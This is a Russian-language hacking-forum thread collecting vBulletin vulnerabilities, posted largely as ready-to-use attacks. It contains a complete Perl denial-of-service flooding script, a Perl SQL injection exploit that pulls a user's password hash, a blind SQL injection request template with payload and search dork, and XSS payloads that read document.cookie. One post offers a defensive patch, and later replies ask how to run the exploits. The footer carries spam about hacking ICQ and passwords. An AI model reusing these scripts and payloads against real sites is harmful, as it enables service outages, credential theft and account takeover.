Старый 03.09.2009, 09:55   #1
DragOn
Полусинтетика
 
Аватар для DragOn
 
Регистрация: 13.04.2009
Сообщений: 1,396
DragOn репутация неоспоримаDragOn репутация неоспоримаDragOn репутация неоспоримаDragOn репутация неоспоримаDragOn репутация неоспоримаDragOn репутация неоспоримаDragOn репутация неоспоримаDragOn репутация неоспоримаDragOn репутация неоспоримаDragOn репутация неоспоримаDragOn репутация неоспорима
DragOn вне форума

По умолчанию Обзор уязвимостей vBulletin


vBulletin® Version 3.8.2 Denial of Service Exploit
Код:
#!usr/bin/perl

#vBulletin® Version 3.8.2 Denial of Service Exploit

#ea$y Laster

##################################################  ######################

# Modules                                                              #

##################################################  ######################

use IO::SOCKET;           # Object interface                           #

##################################################  ######################

if (@ARGV<1){

print"

##################################################  ######################

## _                     _     _                   _                  ##

##| |_ ___ ___ _____ ___|_|___| |_ ___ ___ ___ ___| |_                ##

##|  _| -_| .'|     |___| |   |  _| -_|  _|   | -_|  _|               ##

##|_| |___|__,|_|_|_|   |_|_|_|_| |___|_| |_|_|___|_|                 ##

##                                                                    ##

##################################################  ######################

##################################################  ######################

##                                ##                                  ##

##->vBulletin® Version 3.8.2<-    ##                                  ##

##                                ##                                  ##

##Gebe diese Daten an             ##                                  ##

##1.Ziel                          ##[*] www.Ziel.com                  ##

##2.Board                         ##[*] vbulletin                     ##

##3.Verwundbarkeit                ##[*] forumdisplay.php?f=           ##

##4.Zeit des vorganges            ##[*] 9999999999999999              ##

##5.Port                          ##[*] 80                            ##

##################################################  ######################

\a";}

$block = "

##################################################  ######################";

$fehler = "Fehler!Fehler!Fehler!Fehler";

$x =0;

     print"$block\n";

     print q(Ziel->);

     chomp($ziel =<STDIN>);

     if ($ziel eq""){

     die "$fehler\a\n";}

     print"$block\n";

       print"$block\n";

       print q(Path->);

       chomp($path =<STDIN>);

       if ($path eq "") {

       die "$fehler !\a\n";}

       print"$block\n";

          print"$block\n";

          print "Verwundbarkeit\n";

          print"forumdisplay.php?f=\n";

          print"->"n;

            chomp($vul =<STDIN>);

            if ($vul eq "") {

            die "$fehler !\a\n";}

            print"$block\n";

               print"$block\n";

               print q(Time->);

               chomp($flood =<STDIN>);

               if ($flood eq "") {

               die "$fehler !\a\n";}

                  print"$block\n";

                  print"$block\n";

                  print q(Port->);

                  chomp($port =<STDIN>);

                  if ($port eq ""){

                  die "$fehler \n";}

                  print"$block\n";

                     print q(Send "start"->);

                     chomp($start =<STDIN>);

                     if ($start eq "") {

                     die "$fehler\n";}

print "$block\a\n";

print "[+]Konntroliere Daten \n";

print "[*]Kontroliere Ziel   : $ziel\n";

print "[*]Kontroliere Board  : $path\n";

print "[*]Kontroliere Port   : $port\n";

print "$block\n";

if($start == 1){

while($x != 0000){

$x++;}

}elsif ($start == start){

while($x != $flood)

{

$postit = "$ziel"."$path"."$vul";

$lrg = length $postit;

$sock = new IO::Socket::INET (

                               PeerAddr => "$ziel",

                               PeerPort => "$port",

                               Proto => "tcp",

                              );



print $sock "POST $path$vul HTTP/1.1\n";

print $sock "Host: $ziel\n";

print $sock "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\n";

print $sock "Referer: $ziel\n";

print $sock "Accept-Language: en-us\n";

print $sock "Content-Type: application/x-www-form-urlencoded\n";

print $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.8) Gecko/20070421 Firefox/2.0.0\n";

print $sock "Content-Length: $lrg\n\n";

print $sock "$postit\n";

close($sock);

syswrite STDOUT, "->BLACKOUT<-";

$x++;

}

}else{

die "Fehler kann nicht zum Ziel verbinden $ziel !\n";

}
Что сказал на это zCarot
Цитата:
любой анти-ддос скрипт с этой штукой справится как нечего делать
__________________
[Ссылки доступны только зарегистрированным пользователям . Зарегистрируйся, чтобы увидеть ссылку.]
-
[Ссылки доступны только зарегистрированным пользователям . Зарегистрируйся, чтобы увидеть ссылку.]
-
[Ссылки доступны только зарегистрированным пользователям . Зарегистрируйся, чтобы увидеть ссылку.]
-
[Ссылки доступны только зарегистрированным пользователям . Зарегистрируйся, чтобы увидеть ссылку.]
  Ответить с цитированием
Ответ: Обзор уязвимостей vBulletin
Старый 12.09.2009, 19:17   #2
DragOn
Полусинтетика
 
Аватар для DragOn
 
Регистрация: 13.04.2009
Сообщений: 1,396
DragOn репутация неоспоримаDragOn репутация неоспоримаDragOn репутация неоспоримаDragOn репутация неоспоримаDragOn репутация неоспоримаDragOn репутация неоспоримаDragOn репутация неоспоримаDragOn репутация неоспоримаDragOn репутация неоспоримаDragOn репутация неоспоримаDragOn репутация неоспорима
DragOn вне форума
По умолчанию Ответ: Обзор уязвимостей vBulletin

3.6.12 / 3.7.5 / 3.8.1 XSS - лекарство

3.6.12 / 3.7.5 / 3.8.1
В последних версиях форума была обнаружена XSS уязвимость в управлении редактора. Она позволяет при определенных обстоятельствах выполнять действия от пользователя или же получить доступ к учетной записи пользователя.

Таблетка от сабжа:
файл misc.php

добавить
Код:
 $editorid = preg_replace('#[^a-z0-9_]#i', '', $editorid);
после

Код:
 ############################### Popup Smilies for vbCode ################
if ($_REQUEST['do'] == 'getsmilies')
{
$editorid = $vbulletin->input->clean_gpc('r', 'editorid', TYPE_NOHTML);
__________________
[Ссылки доступны только зарегистрированным пользователям . Зарегистрируйся, чтобы увидеть ссылку.]
-
[Ссылки доступны только зарегистрированным пользователям . Зарегистрируйся, чтобы увидеть ссылку.]
-
[Ссылки доступны только зарегистрированным пользователям . Зарегистрируйся, чтобы увидеть ссылку.]
-
[Ссылки доступны только зарегистрированным пользователям . Зарегистрируйся, чтобы увидеть ссылку.]
  Ответить с цитированием
Ответ: Обзор уязвимостей vBulletin
Старый 19.11.2009, 09:00   #3
DragOn
Полусинтетика
 
Аватар для DragOn
 
Регистрация: 13.04.2009
Сообщений: 1,396
DragOn репутация неоспоримаDragOn репутация неоспоримаDragOn репутация неоспоримаDragOn репутация неоспоримаDragOn репутация неоспоримаDragOn репутация неоспоримаDragOn репутация неоспоримаDragOn репутация неоспоримаDragOn репутация неоспоримаDragOn репутация неоспоримаDragOn репутация неоспорима
DragOn вне форума
По умолчанию Ответ: Обзор уязвимостей vBulletin

Blind - SQL Injection
Opinion System <= 1.4.3

Тип: SQL - Инъекция
Автор: mailbrush
Мод (хак): Opinion System <= 1.4.3
О моде: [Ссылки доступны только зарегистрированным пользователям . Зарегистрируйся, чтобы увидеть ссылку.]
Описание: Уязвимость заключается в отсутствии фильтрации входного параметра "value" в файле opinion.php и позволяет удалённому пользователю внедрить SQL - команды в запрос к базе данных.
Уязвимый код:
opinion.php
PHP код:
$value $_POST[value];
...
            
//пишем мнение в базу
            
$vbulletin->db->query_write("
                INSERT INTO " 
TABLE_PREFIX "opinion (opinionid, fromuserid, touserid, value, dateline, comment, autofill, history, forcehistory".$modyfied1.")
                VALUES (
$opinionid$fromuserid$touserid$value$dateline, '".$vbulletin->db->escape_string($comment)."', $autofill$history$forcehistory".$modyfied2.")
            "
); 
Эксплуатация: Для эксплуатации уязвимости необходимо следующее:
  • Форум vBulletin.
  • Установленный мод Opinion System <= 1.4.3.
  • Зарегистрированный аккаунт на форуме.
Отправляем запрос:
Код:
POST /[path]/opinion.php HTTP/1.1
Host: [host]
Cookie: [cookie]
Connection: Keep-Alive
Content-Length: [content-length]
Content-Type: application/x-www-form-urlencoded

do=postvote&securitytoken=[token]&touserid=[touserid]&fromuserid=[fromuserid]&uop=0&username=[username]&comment=[comment]&value=[SQL]
Код:
[path] - путь к корню форума.
[host] - хост.
[cookie] - куки.
[content-length] - длина POST-запроса.
[token] - securitytoken (не во всех форумах надо указывать).
[touserid] - ID пользователя, которому ставим оценку.
[fromuserid] - ваш ID.
[username] - имя пользователя, которому ставим оценку.
[comment] - комментарий к оценке.
[SQL] - SQL - запрос.
В базу данных пойдет запрос вида
Код:
INSERT INTO prefix_opinion (opinionid, fromuserid, touserid, value, dateline, comment, autofill, history, forcehistory) VALUES ([DATA], [DATA], [DATA], [SQL], [DATA], [DATA], [DATA], [DATA], [DATA])
Соответственно вместо [SQL] можно подставить запрос вида
Код:
(if(substring(@@version,1,1)=5,777,666))
Если условие верно (substring(@@version,1,1)=5), то в оценку добавится +777, если же нет - +666. Кроме этого можно посимвольно вытаскивать любые данные из базы (в т.ч. хэш и соль пользователя).
Дорк:
Код:
vbulletin inurl:opinion.php
__________________
[Ссылки доступны только зарегистрированным пользователям . Зарегистрируйся, чтобы увидеть ссылку.]
-
[Ссылки доступны только зарегистрированным пользователям . Зарегистрируйся, чтобы увидеть ссылку.]
-
[Ссылки доступны только зарегистрированным пользователям . Зарегистрируйся, чтобы увидеть ссылку.]
-
[Ссылки доступны только зарегистрированным пользователям . Зарегистрируйся, чтобы увидеть ссылку.]
  Ответить с цитированием
Ответ: Обзор уязвимостей vBulletin
Старый 08.12.2009, 13:27   #4
DragOn
Полусинтетика
 
Аватар для DragOn
 
Регистрация: 13.04.2009
Сообщений: 1,396
DragOn репутация неоспоримаDragOn репутация неоспоримаDragOn репутация неоспоримаDragOn репутация неоспоримаDragOn репутация неоспоримаDragOn репутация неоспоримаDragOn репутация неоспоримаDragOn репутация неоспоримаDragOn репутация неоспоримаDragOn репутация неоспоримаDragOn репутация неоспорима
DragOn вне форума
По умолчанию Ответ: Обзор уязвимостей vBulletin

Vbseo for Vbulletin LFI < 3.3.2

Степень: критическая
Автор: S(r1pt
Описание: уязвимость позволяет заинклудить локальный файл(картинку), для успешной эксплуатации уязвимости нужно, чтобы аватарки либо юзербары на форуме хранились в файлах и были разрешены для установки.Пример: вывод текста гиф файла прям в браузер:
Код:
[Ссылки доступны только зарегистрированным пользователям . Зарегистрируйся, чтобы увидеть ссылку.]
__________________
[Ссылки доступны только зарегистрированным пользователям . Зарегистрируйся, чтобы увидеть ссылку.]
-
[Ссылки доступны только зарегистрированным пользователям . Зарегистрируйся, чтобы увидеть ссылку.]
-
[Ссылки доступны только зарегистрированным пользователям . Зарегистрируйся, чтобы увидеть ссылку.]
-
[Ссылки доступны только зарегистрированным пользователям . Зарегистрируйся, чтобы увидеть ссылку.]
  Ответить с цитированием
Ответ: Обзор уязвимостей vBulletin
Старый 11.03.2010, 13:58   #5
DragOn
Полусинтетика
 
Аватар для DragOn
 
Регистрация: 13.04.2009
Сообщений: 1,396
DragOn репутация неоспоримаDragOn репутация неоспоримаDragOn репутация неоспоримаDragOn репутация неоспоримаDragOn репутация неоспоримаDragOn репутация неоспоримаDragOn репутация неоспоримаDragOn репутация неоспоримаDragOn репутация неоспоримаDragOn репутация неоспоримаDragOn репутация неоспорима
DragOn вне форума
По умолчанию Ответ: Обзор уязвимостей vBulletin

vBulletin Version 4.0.1 Remote SQL Injection Exploit


Код:
#!/usr/bin/perl 
 
use IO::Socket; 
 
 
print q{ 
#######################################################################
#    vBulletin? Version 4.0.1 Remote SQL Injection Exploit            #
#                      By indoushka                                   #
#                     www.iq-ty.com/vb                                #
#               Souk Naamane  (00213771818860)                        #
#           Algeria Hackerz (indoushka@hotmail.com)                   # 
#          Dork: Powered by vBulletin? Version 4.0.1                  #            
####################################################################### 
}; 
 
if (!$ARGV[2]) { 
 
print q{ 
	Usage: perl  VB4.0.1.pl host /directory/ victim_userid 
 
       perl  VB4.0.1.pl www.vb.com /forum/ 1 
 
 
}; 
 
} 
 
 
$server = $ARGV[0]; 
$dir    = $ARGV[1]; 
$user   = $ARGV[2]; 
$myuser = $ARGV[3]; 
$mypass = $ARGV[4]; 
$myid   = $ARGV[5]; 
 
print "------------------------------------------------------------------------------------------------\r\n"; 
print "[>] SERVER: $server\r\n"; 
print "[>]    DIR: $dir\r\n"; 
print "[>] USERID: $user\r\n"; 
print "------------------------------------------------------------------------------------------------\r\n\r\n"; 
 
$server =~ s/(http:\/\/)//eg; 
 
$path  = $dir; 
$path .= "misc.php?sub=profile&name=0')+UNION+SELECT+0,pass,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0+FROM%20deluxebb_users%20WHERE%20(uid= '".$user ; 
 
 
print "[~] PREPARE TO CONNECT...\r\n"; 
 
$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server", PeerPort => "80") || die "[-] CONNECTION FAILED"; 
 
print "[+] CONNECTED\r\n"; 
print "[~] SENDING QUERY...\r\n"; 
print $socket "GET $path HTTP/1.1\r\n"; 
print $socket "Host: $server\r\n"; 
print $socket "Accept: */*\r\n"; 
print $socket "Connection: close\r\n\r\n"; 
print "[+] DONE!\r\n\r\n"; 
 
 
 
print "--[ REPORT ]------------------------------------------------------------------------------------\r\n"; 
while ($answer = <$socket>) 
{ 
 
 if ($answer =~/(\w{32})/) 
{ 
 
  if ($1 ne 0) { 
   print "Password is: ".$1."\r\n"; 
print "--------------------------------------------------------------------------------------\r\n"; 
 
      } 
exit(); 
} 
 
} 
print "------------------------------------------------------------------------------------------------\r\n";
__________________
[Ссылки доступны только зарегистрированным пользователям . Зарегистрируйся, чтобы увидеть ссылку.]
-
[Ссылки доступны только зарегистрированным пользователям . Зарегистрируйся, чтобы увидеть ссылку.]
-
[Ссылки доступны только зарегистрированным пользователям . Зарегистрируйся, чтобы увидеть ссылку.]
-
[Ссылки доступны только зарегистрированным пользователям . Зарегистрируйся, чтобы увидеть ссылку.]
  Ответить с цитированием
Ответ: Обзор уязвимостей vBulletin
Старый 22.03.2010, 21:07   #6
DragOn
Полусинтетика
 
Аватар для DragOn
 
Регистрация: 13.04.2009
Сообщений: 1,396
DragOn репутация неоспоримаDragOn репутация неоспоримаDragOn репутация неоспоримаDragOn репутация неоспоримаDragOn репутация неоспоримаDragOn репутация неоспоримаDragOn репутация неоспоримаDragOn репутация неоспоримаDragOn репутация неоспоримаDragOn репутация неоспоримаDragOn репутация неоспорима
DragOn вне форума
По умолчанию Ответ: Обзор уязвимостей vBulletin

Vbulletin 4.0.2 XSS Vulnerability

Код:
=================================
Vbulletin 4.0.2 XSS Vulnerability
=================================

[+] Vbulletin 4.0.2 XSS Vulnerability

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : Inj3ct0r.com                                  0
1  [+] Support e-mail  : submit[at]inj3ct0r.com                        1
0                                                                      0
1                    ######################################            1
0                    I'm 5ubzer0  member from Inj3ct0r Team            1
1                    ######################################            0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

[+] Discovered By: 5ubzer0
[+] My id : http://inj3ct0r.com/author/2307
[+] Original : http://inj3ct0r.com/exploits/9697
# Version: Vbulletin 4.0.2

www.site.com/path/search.php?search_type=1&contenttype=vBBlog_BlogEntry&query="><script>alert('xss');</script>
www.site.com/path/search.php?search_type=1&contenttype=vBBlog_BlogEntry&query="><script>alert(document.cookie);</script>

Exemple:
[Ссылки доступны только зарегистрированным пользователям
. Зарегистрируйся, чтобы увидеть ссылку.]


# ~  - [ [ : Inj3ct0r : ] ]
# Inj3ct0r.com [2010-03-19]
__________________
[Ссылки доступны только зарегистрированным пользователям . Зарегистрируйся, чтобы увидеть ссылку.]
-
[Ссылки доступны только зарегистрированным пользователям . Зарегистрируйся, чтобы увидеть ссылку.]
-
[Ссылки доступны только зарегистрированным пользователям . Зарегистрируйся, чтобы увидеть ссылку.]
-
[Ссылки доступны только зарегистрированным пользователям . Зарегистрируйся, чтобы увидеть ссылку.]
  Ответить с цитированием
Ответ: Обзор уязвимостей vBulletin
Старый 23.03.2010, 12:33   #7
tropavert
RAM 2MB
 
Аватар для tropavert
 
Регистрация: 23.03.2010
Сообщений: 2
tropavert Новичок
tropavert вне форума
По умолчанию Ответ: Обзор уязвимостей vBulletin

Цитата:
Сообщение от DragOn Посмотреть сообщение
Vbulletin 4.0.2 XSS Vulnerability

Код:
=================================
Vbulletin 4.0.2 XSS Vulnerability
=================================

[+] Vbulletin 4.0.2 XSS Vulnerability

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : Inj3ct0r.com                                  0
1  [+] Support e-mail  : submit[at]inj3ct0r.com                        1
0                                                                      0
1                    ######################################            1
0                    I'm 5ubzer0  member from Inj3ct0r Team            1
1                    ######################################            0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

[+] Discovered By: 5ubzer0
[+] My id : http://inj3ct0r.com/author/2307
[+] Original : http://inj3ct0r.com/exploits/9697
# Version: Vbulletin 4.0.2

www.site.com/path/search.php?search_type=1&contenttype=vBBlog_BlogEntry&query="><script>alert('xss');</script>
www.site.com/path/search.php?search_type=1&contenttype=vBBlog_BlogEntry&query="><script>alert(document.cookie);</script>

Exemple:
[Ссылки доступны только зарегистрированным пользователям
. Зарегистрируйся, чтобы увидеть ссылку.]


# ~  - [ [ : Inj3ct0r : ] ]
# Inj3ct0r.com [2010-03-19]
он не пашет)это фейк
  Ответить с цитированием
Ответ: Обзор уязвимостей vBulletin
Старый 02.05.2010, 19:30   #8
karencho
RAM 196MB
 
Аватар для karencho
 
Регистрация: 10.04.2010
Сообщений: 205
karencho на пути к лучшему
karencho вне форума
По умолчанию Ответ: Обзор уязвимостей vBulletin

Цитата:
Сообщение от DragOn Посмотреть сообщение
3.6.12 / 3.7.5 / 3.8.1 XSS - лекарство

3.6.12 / 3.7.5 / 3.8.1
В последних версиях форума была обнаружена XSS уязвимость в управлении редактора. Она позволяет при определенных обстоятельствах выполнять действия от пользователя или же получить доступ к учетной записи пользователя.

Таблетка от сабжа:
файл misc.php

добавить
Код:
 $editorid = preg_replace('#[^a-z0-9_]#i', '', $editorid);
после



Код:
 ############################### Popup Smilies for vbCode ################
if ($_REQUEST['do'] == 'getsmilies')
{
$editorid = $vbulletin->input->clean_gpc('r', 'editorid', TYPE_NOHTML);
люди добрые можно по-подробней? ю пока нуб мне нужен експлойт версии3.8.1
как им воспользоватса?спасибо
  Ответить с цитированием
Ответ: Обзор уязвимостей vBulletin
Старый 03.05.2010, 17:28   #9
karencho
RAM 196MB
 
Аватар для karencho
 
Регистрация: 10.04.2010
Сообщений: 205
karencho на пути к лучшему
karencho вне форума
По умолчанию Ответ: Обзор уязвимостей vBulletin

люди хелп , дайте мануал плиз как его использовать?
  Ответить с цитированием
Ответ: Обзор уязвимостей vBulletin
Старый 19.11.2010, 23:11   #10
ScacH
RAM 8MB
 
Аватар для ScacH
 
Регистрация: 23.04.2010
Сообщений: 10
ScacH Новичок
ScacH вне форума
По умолчанию Ответ: Обзор уязвимостей vBulletin

есть какие уязвимости в Version 4.0.8 ?
  Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.



взломать аську аську взломать взлом программы сделать взлом программы как сделать взлом программы хакерские сайты как легко взломать аську лучшие хакерские сайты топ список хакерские сайты взлом паролей легкий взлом паролей

Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2009, Jelsoft Enterprises Ltd. Перевод: zCarot